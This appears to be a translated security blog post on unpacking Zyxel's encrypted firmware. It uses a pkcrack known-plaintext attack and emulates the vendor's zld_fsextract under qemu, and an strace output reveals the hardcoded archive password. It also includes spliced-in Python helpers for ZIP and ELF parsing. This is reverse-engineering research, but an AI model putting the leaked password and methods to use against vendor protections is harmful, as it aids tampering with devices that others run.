Posted on 2022-9-23 16:00:02
Fancy Ways to Decrypt Zyxel's Encrypted Firmware Package

Attachment: link: https://pan.baidu.com/s/1quusIdp38y7fQdF5zZhbiw extraction code: hh9p

Preface

I came across a few interesting articles online and felt they could be combined with what I learned back when I played CTF, so I set out to reproduce them myself.

References:

Reproduction

1. Preparation

Open the URL https://portal.myzyxel.com/my/firmwares and find that it requires a login:

Registering with a temporary mailbox solves that; after all, you don't want your everyday mailbox turned into a spam bin, do you? After registering, visit the site again and pick the version number shown in the figure below:

Click Download after it to fetch the file, then unzip the archive with `unzip -d ./firmware firmware.zip` to obtain:

Our goal now is to extract the device's file system, so the current target is 470AALA0C0.bin. Look at it with binwalk:

The entropy plot sits at essentially 1 throughout, which indicates the firmware is encrypted or compressed. Check its state with `binwalk 470AALA0C0.bin`:

The bin file is actually an encrypted zip archive, which the file command confirms:

Note as well that the extraction yields not only the bin file but several other files too, and these may help us later when decrypting 470AALA0C0.bin:

Compute the CRC32 checksum of each of these files:

Drag 470AALA0C0.bin into Windows, open it with 7-zip and browse down the directory tree; eventually system-default.conf under ./db/etc/zyxel/ftp/conf turns out to have the same checksum as 470AALA0C0.conf from before:

This shows the two files are identical, so I use a known-plaintext attack to unpack the encrypted bin file.

2. Unpacking method 1: known-plaintext attack

Although the plaintext attack is by now a common category of misc challenge in CTFs, I still want to stress a few points here, taking the encrypted system-default.conf above as the example:

A plaintext attack succeeds only when three conditions hold at the same time; none of them can be missing:

The unpacked file is decrypted_file.zip:

Of course you can also run the command without the -d parameter: `pkcrack -C ./470AALA0C0.bin -c db/etc/zyxel/ftp/conf/system-default.conf -P ./ZIPs/470AALA0C0_ZIP_9.zip -p 470AALA0C0.conf`; this tells pkcrack to go on searching for the password after it has found the archive's three-part key:

Note here that pkcrack's cracking is divided into cracking the archive itself (obtaining the keys) and cracking the archive password (obtaining the password). Cracking the archive directly only requires computing the 3 critical keys, and computing these 3 keys is very efficient. Computing the archive password, on the other hand, requires an exhaustive search on top of those 3 keys; while that is more efficient than ordinary brute force without known plaintext, the work grows exponentially with the password length, so when the password is very long the attack is very hard. In fact, in every case cracking the archive directly is a better deal than cracking the password, because the point of cracking the password is ultimately just to get the files. (https://blog.csdn.net/qq_33265520/article/details/110137117)

Besides pkcrack there is a tool with a rather similar name, bkcrack (https://github.com/kimci86/bkcrack), which can unpack an archive using the keys. PS: this tool is still being updated today:

bkcrack GitHub page

pkcrack GitHub page

But bkcrack errors out on me, and I'm not sure whether I'm just using it wrong: `bkcrack -C ./470AALA0C0.bin -c db/etc/zyxel/ftp/conf/system-default.conf -k cb49ab19 32740ab6 7b0c34a2 -d system-default.conf`

Zip error: could not find end of central directory signature... Perhaps bkcrack does not support this kind of zip file... Speechless... Never mind, let's continue with pkcrack's zipdecrypt instead:

Run `zipdecrypt cb49ab19 32740ab6 7b0c34a2 470AALA0C0.bin tmp.zip` to obtain the decrypted archive:

Also, when 7-zip compresses a file, the following options can be set and they affect the final compression ratio:

Extracting compress.img from tmp.zip with binwalk yields the device's file system:
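The CRC32 match above (470AALA0C0.conf against the system-default.conf entry inside the encrypted archive) was done by hand in 7-zip, and bkcrack later refused the file with "could not find end of central directory signature". Both come down to the ZIP central directory: each entry's CRC32, uncompressed size and encryption flag are stored there in the clear even when the entry's data is encrypted, and the directory is located through the end-of-central-directory (EOCD) record at the tail of the archive. The post does not say why bkcrack could not find that record; a common cause with firmware blobs is extra data before or after the archive, so the script below, an added example and not code from the post, pkcrack or bkcrack, scans the whole blob for the EOCD record, corrects the central directory offset when data precedes the archive, and reports which candidate plaintext files match an entry's CRC32 and size. The `build_stored_zip` helper only constructs a demonstration archive; with `encrypted=True` it sets flag bit 0 and reserves 12 placeholder bytes where the ZipCrypto header would sit, it does not actually encrypt anything.

```python
"""Parse a ZIP central directory out of a firmware blob and match entries against candidate plaintext files.

Added example (not code from the post, pkcrack or bkcrack). Standard library only.
"""
import struct
import zlib

EOCD_SIG = b"PK\x05\x06"   # end of central directory record
CDIR_SIG = b"PK\x01\x02"   # central directory file header
LOCAL_SIG = b"PK\x03\x04"  # local file header


def parse_central_directory(blob: bytes) -> list:
    """Return one dict per central directory entry.

    The EOCD record is searched from the end of the whole blob, so data appended after the archive is
    tolerated; the central directory offset is corrected if data precedes the archive (a zip embedded
    in a larger firmware image).
    """
    eocd = blob.rfind(EOCD_SIG)
    if eocd < 0:
        raise ValueError("could not find end of central directory signature")
    total, cd_size, cd_offset = struct.unpack_from("<HII", blob, eocd + 10)
    base = eocd - cd_size - cd_offset  # bytes preceding the archive proper (0 for a plain zip)
    pos = eocd - cd_size
    entries = []
    for _ in range(total):
        if blob[pos:pos + 4] != CDIR_SIG:
            raise ValueError("bad central directory header at offset %d" % pos)
        # flags, method, (skip mtime/mdate), crc32, compressed size, uncompressed size, name/extra/comment lengths
        flags, method, crc, csize, usize, nlen, xlen, clen = struct.unpack_from("<HHxxxxIIIHHH", blob, pos + 8)
        local_off = struct.unpack_from("<I", blob, pos + 42)[0]
        name = blob[pos + 46:pos + 46 + nlen].decode("utf-8", "replace")
        entries.append({
            "name": name,
            "encrypted": bool(flags & 0x1),  # general purpose bit 0: traditional PKWARE (ZipCrypto) encryption
            "method": method,               # 0 = stored, 8 = deflate
            "crc": crc,
            "compressed_size": csize,
            "size": usize,
            "local_offset": base + local_off,
        })
        pos += 46 + nlen + xlen + clen
    return entries


def match_plaintext(entries: list, candidates: dict) -> list:
    """Pair archive entries with candidate files whose CRC32 and uncompressed size agree.

    candidates maps a label to the file's clear-text bytes. A CRC32 plus size match is strong evidence
    that the candidate is the same file, i.e. usable as known plaintext for that entry.
    """
    by_crc = {}
    for label, data in candidates.items():
        by_crc.setdefault((zlib.crc32(data) & 0xFFFFFFFF, len(data)), []).append(label)
    matches = []
    for entry in entries:
        for label in by_crc.get((entry["crc"], entry["size"]), []):
            matches.append((entry["name"], label))
    return matches


def build_stored_zip(files: dict, encrypted: bool = False, prefix: bytes = b"", suffix: bytes = b"") -> bytes:
    """Construct a minimal demonstration archive (method 0 = stored) with optional surrounding data.

    With encrypted=True only the encryption flag bit is set and 12 placeholder bytes stand in for the
    ZipCrypto header; the data is NOT really encrypted. This exists so the parser can be exercised offline.
    """
    flags = 0x1 if encrypted else 0x0
    local = b""
    central = b""
    for name, data in files.items():
        name_b = name.encode("utf-8")
        payload = (b"\x00" * 12 + data) if encrypted else data
        crc = zlib.crc32(data) & 0xFFFFFFFF
        central += struct.pack("<IHHHHHHIIIHHHHHII", 0x02014B50, 20, 20, flags, 0, 0, 0, crc,
                               len(payload), len(data), len(name_b), 0, 0, 0, 0, 0, len(local)) + name_b
        local += LOCAL_SIG + struct.pack("<HHHHHIIIHH", 20, flags, 0, 0, 0, crc, len(payload),
                                         len(data), len(name_b), 0) + name_b + payload
    eocd = struct.pack("<IHHHHIIH", 0x06054B50, 0, 0, len(files), len(files), len(central), len(local), 0)
    return prefix + local + central + eocd + suffix


if __name__ == "__main__":
    import sys
    for e in parse_central_directory(open(sys.argv[1], "rb").read()):
        print("%-60s enc=%d method=%d crc=%08x size=%d" % (e["name"], e["encrypted"], e["method"], e["crc"], e["size"]))
```

Run it as `python3 zipdir.py 470AALA0C0.bin` to list every entry with its CRC32 and encryption flag, then feed `match_plaintext` the sibling files from the outer zip to find known-plaintext candidates the way the CRC comparison above did by hand.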
3. Unpacking method 2: decrypting with the firmware's own program

Apart from the plaintext attack there is another way to unpack the firmware: use the decryption program shipped inside the firmware itself. Since compress.img, the image containing the file system, lives inside the encrypted 470AALA0C0.bin, there must be a decryption program somewhere else, and 470AALA0C0.ri is the obvious candidate:

A quick look with binwalk:

There is a uImage header; extract with `binwalk -Me`:

Among the boot files we notice the name fsextract, which we guess may be the decryption program for the firmware's file system (file system extract). Gather some information about the file:

It is a statically linked big-endian ELF executable, which can be emulated with qemu. Note that although file reports the executable as ELF 32-bit, it is actually a 64-bit program:

Running this kind of program requires qemu's mipsn32, as shown below:

If you run it with qemu-mips-static instead you get a segfault, with the message Illegal instruction:
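The "ELF 32-bit but really 64-bit" situation above is the MIPS n32 ABI: the ELF container is class 32, but the `EF_MIPS_ABI2` bit in `e_flags` marks it as n32 code for a 64-bit instruction set, which is why `qemu-mips-static` (o32) faults and `qemu-mipsn32-static` runs it. The following added example (not code from the post, from binwalk or from qemu) reads those header fields and names the matching qemu-user binary, so the check can be scripted instead of discovered through an Illegal instruction crash. The `make_elf_header` helper only constructs a synthetic header for the offline demonstration.

```python
"""Decide which qemu-user binary a MIPS ELF needs by reading its header.

Added example, not from the post. The constants are the standard ELF / MIPS e_flags values.
"""
import struct

ELFCLASS32, ELFCLASS64 = 1, 2
ELFDATA2LSB, ELFDATA2MSB = 1, 2
EM_MIPS = 8
EF_MIPS_ABI2 = 0x00000020      # n32 ABI: 32-bit ELF container, 64-bit instruction set
EF_MIPS_ABI_O32 = 0x00001000   # classic o32 ABI
EF_MIPS_ARCH_64 = 0x60000000   # EF_MIPS_ARCH field values (top nibble of e_flags)
EF_MIPS_ARCH_64R2 = 0x80000000


def inspect_elf(data: bytes) -> dict:
    """Return class, endianness, type, machine and e_flags from an ELF header."""
    if len(data) < 52 or data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    ei_class, ei_data = data[4], data[5]
    if ei_class not in (ELFCLASS32, ELFCLASS64) or ei_data not in (ELFDATA2LSB, ELFDATA2MSB):
        raise ValueError("unsupported EI_CLASS/EI_DATA")
    prefix = ">" if ei_data == ELFDATA2MSB else "<"
    if ei_class == ELFCLASS32:
        # Elf32_Ehdr after e_ident: e_type, e_machine, e_version, e_entry, e_phoff, e_shoff, e_flags
        e_type, e_machine, _, _, _, _, e_flags = struct.unpack_from(prefix + "HHIIIII", data, 16)
    else:
        if len(data) < 64:
            raise ValueError("truncated ELF64 header")
        # Elf64_Ehdr: e_entry/e_phoff/e_shoff are 8 bytes wide
        e_type, e_machine, _, _, _, _, e_flags = struct.unpack_from(prefix + "HHIQQQI", data, 16)
    return {"class": ei_class, "big_endian": ei_data == ELFDATA2MSB,
            "type": e_type, "machine": e_machine, "flags": e_flags}


def mips_abi(info: dict) -> str:
    """o32, n32 or n64 for a MIPS ELF; raises for other machines."""
    if info["machine"] != EM_MIPS:
        raise ValueError("not a MIPS ELF (e_machine=%d)" % info["machine"])
    if info["class"] == ELFCLASS64:
        return "n64"
    if info["flags"] & EF_MIPS_ABI2:
        return "n32"
    return "o32"


def qemu_user_binary(info: dict) -> str:
    """Map ABI and endianness to the qemu-user static binary name."""
    core = {"o32": "qemu-mips", "n32": "qemu-mipsn32", "n64": "qemu-mips64"}[mips_abi(info)]
    return core + ("" if info["big_endian"] else "el") + "-static"


def make_elf_header(elf_class: int, big_endian: bool, machine: int, flags: int) -> bytes:
    """Construct a synthetic ELF header (enough for inspect_elf) for offline demonstration."""
    ident = b"\x7fELF" + bytes([elf_class, ELFDATA2MSB if big_endian else ELFDATA2LSB, 1, 0]) + bytes(8)
    prefix = ">" if big_endian else "<"
    if elf_class == ELFCLASS32:
        return ident + struct.pack(prefix + "HHIIIIIHHHHHH", 2, machine, 1, 0, 52, 0, flags, 52, 32, 0, 40, 0, 0)
    return ident + struct.pack(prefix + "HHIQQQIHHHHHH", 2, machine, 1, 0, 64, 0, flags, 64, 56, 0, 64, 0, 0)


if __name__ == "__main__":
    import sys
    with open(sys.argv[1], "rb") as fh:
        info = inspect_elf(fh.read(64))
    print("abi=%s flags=0x%08x -> %s" % (mips_abi(info), info["flags"], qemu_user_binary(info)))
```

Running it against zld_fsextract before emulating would print the n32 verdict directly; the same header read also tells you the endianness, so the `el` variants are chosen automatically for little-endian images.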
Running it with qemu-mipsn32-static:

Good grief, a program from 2010; this decryptor is old... To learn how to use the executable we have to go back to zyinit in the parent directory, which from its name looks like the Zyxel device's init program and which contains the string zld_fsextract:

Drag zyinit into IDA to look at it:

Follow the cross-reference to /zyinit/zld_fsextract:

Combining what we learned earlier, the extraction command should have the form `./zld_fsextract <firmware name> ./unzip -s extract -e`, i.e. `qemu-mipsn32-static -strace ./zld_fsextract 470AALA0C0.bin ./unzip -s extract -e`:

Still a segfault. It feels like something is missing after the -e parameter, and si_addr=NULL tells us the segfault comes from a NULL pointer, so let's properly reverse zld_fsextract. Following the cross-reference we arrive at:

Cross-referencing sub_10001198 brings us to:

A rough look at what the parameters do:

There is a list parameter above, which roughly lists information about some files:

```bash
cyberangel@cyberangel:~/Desktop/Zyxel/firmware/_470AALA0C0.ri.extracted/_240.extracted/cpio-root/zyinit$ qemu-mipsn32-static ./zld_fsextract 470AALA0C0.bin ./unzip -s list
name :kernel
scope :-f kernelshare40.bin -f kernelchecksum -D /
nc_scope :-f kernelshare40.bin
version :3.10.87
build_date :2021-10-27 16:34:05
checksum :db77009f14d2f36f0fbb73bf6655ba75
core_checksum :582806436b89d0eefd3b20e9348482a1
name :code
scope :-f bmshare40.bin -f bmchecksum -f kernelshare40.bin -f kernelchecksum -d wtp_image -d db -i -D /rw
scope :-d db/etc/zyxel/ftp/conf -D /
nc_scope :-f fwversion -f filechecksum -f wtpinfo
version :4.70(AALA.0)
build_date :2021-10-27 17:02:25
checksum :c8ad7e3bcf3f7a710d063f2154d99307
core_checksum :35b92a6d1192fdb23c78a7324feda44c
name :WTP_wtp_image/nwa5120
scope :-f wtp_image/nwa5120 -D /db
nc_scope :
version :5.10(###.10)
build_date :2021-01-21 10:04:56
checksum :
core_checksum :
name :WTP_wtp_image/wax650
scope :-f wtp_image/wax650 -D /db
nc_scope :
version :6.25(###.1)
build_date :2021-10-04 03:22:31
checksum :
core_checksum :
name :WTP_wtp_image/wac6500
scope :-f wtp_image/wac6500 -D /db
nc_scope :
version :6.25(###.0)
build_date :2021-09-17 03:42:10
checksum :
core_checksum :
name :WTP_wtp_image/nwa5301
scope :-f wtp_image/nwa5301 -D /db
nc_scope :
version :5.10(###.10)
build_date :2021-01-21 10:27:30
checksum :
core_checksum :
name :WTP_wtp_image/nwa5123-ac
scope :-f wtp_image/nwa5123-ac -D /db
nc_scope :
version :6.10(###.10)
build_date :2021-01-21 15:20:56
checksum :c1695615ba4a9f462cc5af123a60d82c
core_checksum :c1695615ba4a9f462cc5af123a60d82c
name :WTP_wtp_image/nwa5kcn50
scope :-f wtp_image/nwa5kcn50 -D /db
nc_scope :
version :5.10(###.3)
build_date :2018-01-23 11:28:31
checksum :
core_checksum :
name :WTP_wtp_image/wac500h
scope :-f wtp_image/wac500h -D /db
nc_scope :
version :6.25(###.0)
build_date :2021-09-17 08:01:37
checksum :
core_checksum :
name :WTP_wtp_image/wac500
scope :-f wtp_image/wac500 -D /db
nc_scope :
version :6.25(###.0)
build_date :2021-09-17 07:16:39
checksum :
core_checksum :
name :WTP_wtp_image/wac6100
scope :-f wtp_image/wac6100 -D /db
nc_scope :
version :6.25(###.0)
build_date :2021-09-17 04:16:53
checksum :
core_checksum :
name :WTP_wtp_image/wax610
scope :-f wtp_image/wax610 -D /db
nc_scope :
version :6.25(###.1)
build_date :2021-10-04 01:41:11
checksum :
core_checksum :
name :WTP_wtp_image/wac6300
scope :-f wtp_image/wac6300 -D /db
nc_scope :
version :6.25(###.0)
build_date :2021-09-17 03:13:45
checksum :
core_checksum :
name :WTP_wtp_image/wac5300v2
scope :-f wtp_image/wac5300v2 -D /db
nc_scope :
version :6.25(###.0)
build_date :2021-09-17 08:28:21
checksum :
core_checksum :
name :WTP_wtp_image/wax510
scope :-f wtp_image/wax510 -D /db
nc_scope :
version :6.25(###.1)
build_date :2021-10-04 04:12:21
checksum :
core_checksum :
name :WTP_wtp_image/wac5300
scope :-f wtp_image/wac5300 -D /db
nc_scope :
version :6.10(###.10)
build_date :2021-01-21 12:16:54
checksum :
core_checksum :
name :WTP_wtp_image/nwa5123-ac-hd
scope :-f wtp_image/nwa5123-ac-hd -D /db
nc_scope :
version :6.25(###.0)
build_date :2021-09-17 04:43:21
checksum :fd5bdf5ed8a5277ee8ad3988361cd973
core_checksum :fd5bdf5ed8a5277ee8ad3988361cd973
cyberangel@cyberangel:~/Desktop/Zyxel/firmware/_470AALA0C0.ri.extracted/_240.extracted/cpio-root/zyinit$
```
Although this does not look very useful, experience suggests list lists file information and the extract parameter should then extract those files, since both parameters sit under -s. Let's try:

```bash
cyberangel@cyberangel:~/Desktop/Zyxel/firmware/_470AALA0C0.ri.extracted/_240.extracted/cpio-root/zyinit$ qemu-mipsn32-static -strace ./zld_fsextract 470AALA0C0.bin ./unzip -s extract -e code
12764 ioctl(0,21517,1082129888,1082130724,8,0) = 0
12764 ioctl(1,21517,1082129888,1082130017,8,1) = 0
12764 rt_sigaction(SIGALRM,0x407ffb50,0x407ffb70) = 0
12764 brk(NULL) = 0x10129000
12764 brk(0x1012a000) = 0x1012a000
12764 brk(0x1012d000) = 0x1012d000
12764 brk(0x10131000) = 0x10131000
12764 brk(0x10135000) = 0x10135000
12764 alarm(1,268500992,269568872,115,1082130838,1936946035) = 0
12764 open("470AALA0C0.bin",O_RDONLY) = 3
12764 ioctl(3,21517,1082129312,0,1082129948,0) = -1 errno=25 (Inappropriate ioctl for device)
12764 brk(0x10136000) = 0x10136000
12764 lseek(3,-12,2,269700192,1082129948,1) = 136920272
12764 Linux(3,1082129568,4,269700128,1082129948,1) = 4
12764 Linux(3,1082129572,4,269700128,1082129948,1) = 4
12764 brk(0x10155000) = 0x10155000
12764 lseek(3,-126604,2,269704296,1082129948,1) = 136793680
12764 Linux(3,269704304,126592,269700128,1082129948,1) = 126592
12764 brk(0x10162000) = 0x10162000
12764 brk(0x10163000) = 0x10163000
12764 brk(0x10164000) = 0x10164000
12764 brk(0x10165000) = 0x10165000
12764 brk(0x10166000) = 0x10166000
12764 brk(0x10167000) = 0x10167000
12764 brk(0x10169000) = 0x10169000
12764 close(3) = 0
12764 fork() = 12766
= 0
12764 wait4(-1,1082108672,0,0,1082129416,2)12766 execve("./unzip",{"./unzip","-o","-q","-P","vj/LOia3/vyoiX2No0MPojOrg0Pvf3OboPyC7YI9TGzCp1be3z3tiUkPWAKBFko","470AALA0C0.bin","-d","/rw","compress.img","etc_writable/","etc_writable/ModemManager/","etc_writable/ModemManager/libmm-plugin-altair-lte.so","etc_writable/ModemManager/libmm-plugin-anydata.so","etc_writable/ModemManager/libmm-plugin-cinterion.so","etc_writable/ModemManager/libmm-plugin-generic.so","etc_writable/ModemManager/libmm-plugin-gobi.so","etc_writable/ModemManager/libmm-plugin-hso.so","etc_writable/ModemManager/libmm-plugin-huawei.so","etc_writable/ModemManager/libmm-plugin-iridium.so","etc_writable/ModemManager/libmm-plugin-linktop.so","etc_writable/ModemManager/libmm-plugin-longcheer.so","etc_writable/ModemManager/libmm-plugin-mbm.so","etc_writable/ModemManager/libmm-plugin-motorola.so","etc_writable/ModemManager/libmm-plugin-mtk.so","etc_writable/ModemManager/libmm-plugin-nokia-icera.so","etc_writable/ModemManager/libmm-plugin-nokia.so","etc_writable/ModemManager/libmm-plugin-novatel-lte.so","etc_writable/ModemManager/libmm-plugin-novatel.so","etc_writable/ModemManager/libmm-plugin-option.so","etc_writable/ModemManager/libmm-plugin-pantech.so","etc_writable/ModemManager/libmm-plugin-samsung.so","etc_writable/ModemManager/libmm-plugin-sierra.so","etc_writable/ModemManager/libmm-plugin-simtech.so","etc_writable/ModemManager/libmm-plugin-telit.so","etc_writable/ModemManager/libmm-plugin-via.so","etc_writable/ModemManager/libmm-plugin-wavecom.so","etc_writable/ModemManager/libmm-plugin-x22x.so","etc_writable/ModemManager/libmm-plugin-zte.so","etc_writable/budget/","etc_writable/budget/budget.conf","etc_writable/cloud_checksum","etc_writable/dhcp6c-script","etc_writable/firmware-upgraded","etc_writable/tr069ta.conf","etc_writable/usb_modeswitch/","etc_writable/usb_modeswitch/03f0:002a","etc_writable/usb_modeswitch/0408:1000","etc_writable/usb_modeswitch/0408:ea17","etc_writable/usb_modeswitch/0408:ea25","etc_writable/usb_modeswitch/0408:ea43","etc_writable/usb_modeswitch/0408:f000","etc_writable/usb_modeswitch/0408:f001","etc_writable/usb_modeswitch/0421:060c","etc_writable/usb_modeswitch/0421:0610","etc_writable/usb_modeswitch/0421:0618","etc_writable/usb_modeswitch/0421:061d","etc_writable/usb_modeswitch/0421:0622","etc_writable/usb_modeswitch/0421:0627","etc_writable/usb_modeswitch/0421:062c","etc_writable/usb_modeswitch/0421:0632","etc_writable/usb_modeswitch/0421:0637","etc_writable/usb_modeswitch/0471:1210:uMa=Philips","etc_writable/usb_modeswitch/0471:1210:uMa=Wisue","etc_writable/usb_modeswitch/0471:1237","etc_writable/usb_modeswitch/0482:024d","etc_writable/usb_modeswitch/04bb:bccd","etc_writable/usb_modeswitch/04cc:2251","etc_writable/usb_modeswitch/04cc:225c","etc_writable/usb_modeswitch/04cc:226e","etc_writable/usb_modeswitch/04cc:226f","etc_writable/usb_modeswitch/04e8:680c","etc_writable/usb_modeswitch/04e8:689a","etc_writable/usb_modeswitch/04e8:f000:sMo=U209","etc_writable/usb_modeswitch/04fc:2140","etc_writable/usb_modeswitch/057c:62ff","etc_writable/usb_modeswitch/057c:84ff","etc_writable/usb_modeswitch/0586:0002","etc_writable/usb_modeswitch/0586:3441","etc_writable/usb_modeswitch/05c6:0010","etc_writable/usb_modeswitch/05c6:1000:sVe=GT","etc_writable/usb_modeswitch/05c6:1000:sVe=Option","etc_writable/usb_modeswitch/05c6:1000:uMa=AnyDATA","etc_writable/usb_modeswitch/05c6:1000:uMa=CELOT","etc_writable/usb_modeswitch/05c6:1000:uMa=DGT","etc_writable/usb_modeswitch/05c6:1000:uMa=Option","etc_writable/usb_modeswitch/05c6:1000:uMa=SAMSUNG","etc_writable/usb_modeswitch/05c6:1000:uMa=SSE","etc_writable/usb_modeswitch/05c6:1000:uMa=StrongRising","etc_writable/usb_modeswitch/05c6:1000:uMa=Vertex","etc_writable/usb_modeswitch/05c6:2000","etc_writable/usb_modeswitch/05c6:2001","etc_writable/usb_modeswitch/05c6:6503","etc_writable/usb_modeswitch/05c6:9024","etc_writable/usb_modeswitch/05c6:f000","etc_writable/usb_modeswitch/05c7:1000","etc_writable/usb_modeswitch/0685:2000","etc_writable/usb_modeswitch/072f:100d","etc_writable/usb_modeswitch/07d1:a800","etc_writable/usb_modeswitch/07d1:a804","etc_writable/usb_modeswitch/0922:1001","etc_writable/usb_modeswitch/0922:1003","etc_writable/usb_modeswitch/0930:0d46","etc_writable/usb_modeswitch/0ace:2011","etc_writable/usb_modeswitch/0ace:20ff","etc_writable/usb_modeswitch/0af0:4007","etc_writable/usb_modeswitch/0af0:6711","etc_writable/usb_modeswitch/0af0:6731","etc_writable/usb_modeswitch/0af0:6751","etc_writable/usb_modeswitch/0af0:6771","etc_writable/usb_modeswitch/0af0:6791","etc_writable/usb_modeswitch/0af0:6811","etc_writable/usb_modeswitch/0af0:6911","etc_writable/usb_modeswitch/0af0:6951","etc_writable/usb_modeswitch/0af0:6971","etc_writable/usb_modeswitch/0af0:7011","etc_writable/usb_modeswitch/0af0:7031","etc_writable/usb_modeswitch/0af0:7051","etc_writable/usb_modeswitch/0af0:7071","etc_writable/usb_modeswitch/0af0:7111","etc_writable/usb_modeswitch/0af0:7211","etc_writable/usb_modeswitch/0af0:7251","etc_writable/usb_modeswitch/0af0:7271","etc_writable/usb_modeswitch/0af0:7301","etc_writable/usb_modeswitch/0af0:7311","etc_writable/usb_modeswitch/0af0:7361","etc_writable/usb_modeswitch/0af0:7381","etc_writable/usb_modeswitch/0af0:7401","etc_writable/usb_modeswitch/0af0:7501","etc_writable/usb_modeswitch/0af0:7601","etc_writable/usb_modeswitch/0af0:7701","etc_writable/usb_modeswitch/0af0:7706","etc_writable/usb_modeswitch/0af0:7801","etc_writable/usb_modeswitch/0af0:7901","etc_writable/usb_modeswitch/0af0:7a01","etc_writable/usb_modeswitch/0af0:7a05","etc_writable/usb_modeswitch/0af0:8006","etc_writable/usb_modeswitch/0af0:8200","etc_writable/usb_modeswitch/0af0:8201","etc_writable/usb_modeswitch/0af0:8300","etc_writable/usb_modeswitch/0af0:8302","etc_writable/usb_modeswitch/0af0:8304","etc_writable/usb_modeswitch/0af0:8400","etc_writable/usb_modeswitch/0af0:8600","etc_writable/usb_modeswitch/0af0:8700","etc_writable/usb_modeswitch/0af0:8800","etc_writable/usb_modeswitch/0af0:8900","etc_writable/usb_modeswitch/0af0:9000","etc_writable/usb_modeswitch/0af0:9200","etc_writable/usb_modeswitch/0af0:c031","etc_writable/usb_modeswitch/0af0:c100","etc_writable/usb_modeswitch/0af0:d001","etc_writable/usb_modeswitch/0af0:d013","etc_writable/usb_modeswitch/0af0:d031","etc_writable/usb_modeswitch/0af0:d033","etc_writable/usb_modeswitch/0af0:d035","etc_writable/usb_modeswitch/0af0:d055","etc_writable/usb_modeswitch/0af0:d057","etc_writable/usb_modeswitch/0af0:d058","etc_writable/usb_modeswitch/0af0:d155","etc_writable/usb_modeswitch/0af0:d157","etc_writable/usb_modeswitch/0af0:d255","etc_writable/usb_modeswitch/0af0:d257","etc_writable/usb_modeswitch/0af0:d357","etc_writable/usb_modeswitch/0b3c:c700","etc_writable/usb_modeswitch/0b3c:f000","etc_writable/usb_modeswitch/0b3c:f00c","etc_writable/usb_modeswitch/0b3c:f017","etc_writable/usb_modeswitch/0bdb:190d","etc_writable/usb_modeswitch/0bdb:1910","etc_writable/usb_modeswitch/0cf3:20ff","etc_writable/usb_modeswitch/0d46:45a1","etc_writable/usb_modeswitch/0d46:45a5","etc_writable/usb_modeswitch/0df7:0800","etc_writable/usb_modeswitch/0e8d:0002:uPr=MT","etc_writable/usb_modeswitch/0e8d:0002:uPr=Product","etc_writable/usb_modeswitch/0e8d:7109","etc_writable/usb_modeswitch/0fca:8020","etc_writable/usb_modeswitch/0fce:d0cf","etc_writable/usb_modeswitch/0fce:d0df","etc_writable/usb_modeswitch/0fce:d0e1","etc_writable/usb_modeswitch/0fce:d103","etc_writable/usb_modeswitch/0fd1:1000","etc_writable/usb_modeswitch/1004:1000","etc_writable/usb_modeswitch/1004:607f","etc_writable/usb_modeswitch/1004:613a","etc_writable/usb_modeswitch/1004:613f","etc_writable/usb_modeswitch/1004:614e","etc_writable/usb_modeswitch/1004:6156","etc_writable/usb_modeswitch/1004:6190","etc_writable/usb_modeswitch/1004:61aa","etc_writable/usb_modeswitch/1004:61dd","etc_writable/usb_modeswitch/1004:61e7","etc_writable/usb_modeswitch/1004:61eb","etc_writable/usb_modeswitch/1004:6327","etc_writable/usb_modeswitch/1033:0035","etc_writable/usb_modeswitch/106c:3b03","etc_writable/usb_modeswitch/106c:3b05","etc_writable/usb_modeswitch/106c:3b06","etc_writable/usb_modeswitch/106c:3b11","etc_writable/usb_modeswitch/106c:3b14","etc_writable/usb_modeswitch/1076:7f40","etc_writable/usb_modeswitch/109b:f009","etc_writable/usb_modeswitch/10a9:606f","etc_writable/usb_modeswitch/10a9:6080","etc_writable/usb_modeswitch/1199:0fff","etc_writable/usb_modeswitch/1266:1000","etc_writable/usb_modeswitch/12d1:#android","etc_writable/usb_modeswitch/12d1:#linux","etc_writable/usb_modeswitch/12d1:1001","etc_writable/usb_modeswitch/12d1:1003","etc_writable/usb_modeswitch/12d1:1009","etc_writable/usb_modeswitch/12d1:1010","etc_writable/usb_modeswitch/12d1:101e","etc_writable/usb_modeswitch/12d1:1030","etc_writable/usb_modeswitch/12d1:1031","etc_writable/usb_modeswitch/12d1:1413","etc_writable/usb_modeswitch/12d1:1414","etc_writable/usb_modeswitch/12d1:1446","etc_writable/usb_modeswitch/12d1:1449","etc_writable/usb_modeswitch/12d1:14ad","etc_writable/usb_modeswitch/12d1:14b5","etc_writable/usb_modeswitch/12d1:14b7","etc_writable/usb_modeswitch/12d1:14ba","etc_writable/usb_modeswitch/12d1:14c1","etc_writable/usb_modeswitch/12d1:14c3","etc_writable/usb_modeswitch/12d1:14c4","etc_writable/usb_modeswitch/12d1:14c5","etc_writable/usb_modeswitch/12d1:14d1","etc_writable/usb_modeswitch/12d1:14fe","etc_writable/usb_modeswitch/12d1:1505","etc_writable/usb_modeswitch/12d1:151a","etc_writable/usb_modeswitch/12d1:1520","etc_writable/usb_modeswitch/12d1:1521","etc_writable/usb_modeswitch/12d1:1523","etc_writable/usb_modeswitch/12d1:1526","etc_writable/usb_modeswitch/12d1:1553","etc_writable/usb_modeswitch/12d1:1557","etc_writable/usb_modeswitch/12d1:155a","etc_writable/usb_modeswitch/12d1:155b","etc_writable/usb_modeswitch/12d1:156a","etc_writable/usb_modeswitch/12d1:157c","etc_writable/usb_modeswitch/12d1:157d","etc_writable/usb_modeswitch/12d1:1582","etc_writable/usb_modeswitch/12d1:1583","etc_writable/usb_modeswitch/12d1:15ca","etc_writable/usb_modeswitch/12d1:15cd","etc_writable/usb_modeswitch/12d1:15cf","etc_writable/usb_modeswitch/12d1:15e7","etc_writable/usb_modeswitch/12d1:1805","etc_writable/usb_modeswitch/12d1:1c0b","etc_writable/usb_modeswitch/12d1:1c1b","etc_writable/usb_modeswitch/12d1:1c24","etc_writable/usb_modeswitch/12d1:1d50","etc_writable/usb_modeswitch/12d1:1da1","etc_writable/usb_modeswitch/12d1:1f01","etc_writable/usb_modeswitch/12d1:1f02","etc_writable/usb_modeswitch/12d1:1f03","etc_writable/usb_modeswitch/12d1:1f07","etc_writable/usb_modeswitch/12d1:1f09","etc_writable/usb_modeswitch/12d1:1f11","etc_writable/usb_modeswitch/12d1:1f15","etc_writable/usb_modeswitch/12d1:1f16","etc_writable/usb_modeswitch/12d1:1f17","etc_writable/usb_modeswitch/12d1:1f18","etc_writable/usb_modeswitch/12d1:1f19","etc_writable/usb_modeswitch/12d1:1f1b","etc_writable/usb_modeswitch/12d1:1f1c","etc_writable/usb_modeswitch/12d